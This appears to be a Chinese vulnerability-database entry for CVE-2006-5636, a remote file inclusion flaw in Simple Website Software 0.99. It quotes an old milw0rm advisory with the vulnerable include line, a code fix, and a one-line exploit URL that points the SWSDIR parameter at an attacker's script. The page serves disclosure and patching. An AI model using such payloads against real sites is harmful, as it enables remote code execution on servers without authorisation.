Simple Website Software 'Common.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111415 漏洞类型 输入验证
发布时间 2006-10-29 更新时间 2006-11-02
CVE编号 CVE-2006-5636 CNNVD-ID CNNVD-200610-543
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2673
https://cxsecurity.com/issue/WLB-2006110002
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-543
|漏洞详情
SimpleWebsiteSoftware(SWS)的common.php中存在PHP远程文件包含漏洞,远程攻击者可以通过SWSDIR参数中的URL执行任意PHP代码。
|漏洞EXP
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Script: Simple Website Software v0.99 (common.php) Remote File Include

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Found: Cyber-Security

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Version: 3.0

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Code: include_once "$SWSDIR/local_config.php";

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

F.X:

1- open common.php
2- add this code before wrong code

$SWSDIR = getcwd() . '/..';

3- save common.php

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Exploit: common.php?SWSDIR=evilscripts?

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Script Download: http://prdownloads.sourceforge.net/phpsws/phpsws-0.99.tgz?download

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 

# milw0rm.com [2006-10-29]
|参考资料

来源:XF
名称:sws-common-file-include(29861)
链接:http://xforce.iss.net/xforce/xfdb/29861
来源:BID
名称:20787
链接:http://www.securityfocus.com/bid/20787
来源:BUGTRAQ
名称:20061029SimpleWebsiteSoftwarev0.99(common.php)RemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/450050/100/0/threaded
来源:MILW0RM
名称:2673
链接:http://www.milw0rm.com/exploits/2673
来源:VUPEN
名称:ADV-2006-4262
链接:http://www.frsirt.com/english/advisories/2006/4262
来源:SECUNIA
名称:22618
链接:http://secunia.com/advisories/22618
来源:OSVDB
名称:30131
链接:http://www.osvdb.org/30131
来源:SREASON
名称:1799
链接:http://securityreason.com/securityalert/1799
来源:MILW0RM
名称:2673